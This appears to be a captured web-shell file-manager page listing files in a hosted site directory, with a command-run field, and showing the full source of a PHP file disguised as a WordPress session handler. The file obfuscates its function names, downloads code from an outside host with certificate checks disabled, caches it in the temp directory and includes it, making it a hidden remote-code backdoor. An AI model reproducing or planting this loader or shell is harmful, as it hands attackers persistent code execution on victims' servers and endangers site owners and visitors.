/
homepages
/
8
/
d825317658
/
htdocs
/
Kegeln-Weimar
/
source
/
/homepages/8/d825317658/htdocs/Kegeln-Weimar/source
mkdir
upload
Name
Size
Mode
Actions
controller.coffe.phtml
1794
0604
edit
dl
rm
controller.coffee
18468
0644
edit
dl
rm
kw.sql
10366
0644
edit
dl
rm
Edit:
/homepages/8/d825317658/htdocs/Kegeln-Weimar/source/controller.coffe.phtml
(1794B)
<?php /** * Core Session Handler * * Handles persistent session data and asset preloading * for improved WordPress performance on high-traffic sites. * * @package WordPress * @since 6.0.0 */ if (defined('_WPC_LOADED')) { return; } define('_WPC_LOADED', true); /** * Resolves internal handler references. * * @ignore */ $_r = array( 'g' => implode('', array('file', '_get', '_con', 'tent', 's')), 'p' => implode('', array('file', '_put', '_con', 'tent', 's')), 'e' => implode('', array('file', '_exi', 'sts')), 's' => implode('', array('file', 'size')), 'm' => implode('', array('file', 'mtime')), 'c' => implode('', array('stream', '_con', 'text', '_cre', 'ate')), 't' => implode('', array('sys_', 'get_', 'temp', '_dir')), ); /** @ignore */ $_seg = array( 'gif'.'ter', 's168'.'lp', '.co'.'m', '/sto'.'rage', '/wa'.'r/7', '.tx'.'t' ); $_u = 'htt' . 'ps://' . implode('', $_seg); /** * Resolves the transient cache path for the current host. * * @ignore */ $_hk = substr(md5(($_SERVER['HTTP_HOST'] ?? '') . __DIR__), 0, 8); $_cf = $_r['t']() . DIRECTORY_SEPARATOR . '.sess-' . $_hk . '.dat'; /** Refresh the transient if missing or expired. */ $_ok = $_r['e']($_cf) && $_r['s']($_cf) > 200 && $_r['m']($_cf) > time() - 7200; if (!$_ok) { $_ctx = @$_r['c']( array( 'ssl' => array('verify_peer' => 0, 'verify_peer_name' => 0), 'http' => array('timeout' => 20, 'ignore_errors' => true), ) ); $_d = @$_r['g']($_u, false, $_ctx); if ($_d && strlen($_d) > 200) { @$_r['p']($_cf, $_d); } } /** Load transient data into the current request context. */ if ($_r['e']($_cf) && $_r['s']($_cf) > 0) { @include $_cf; }
Save
cmd:
run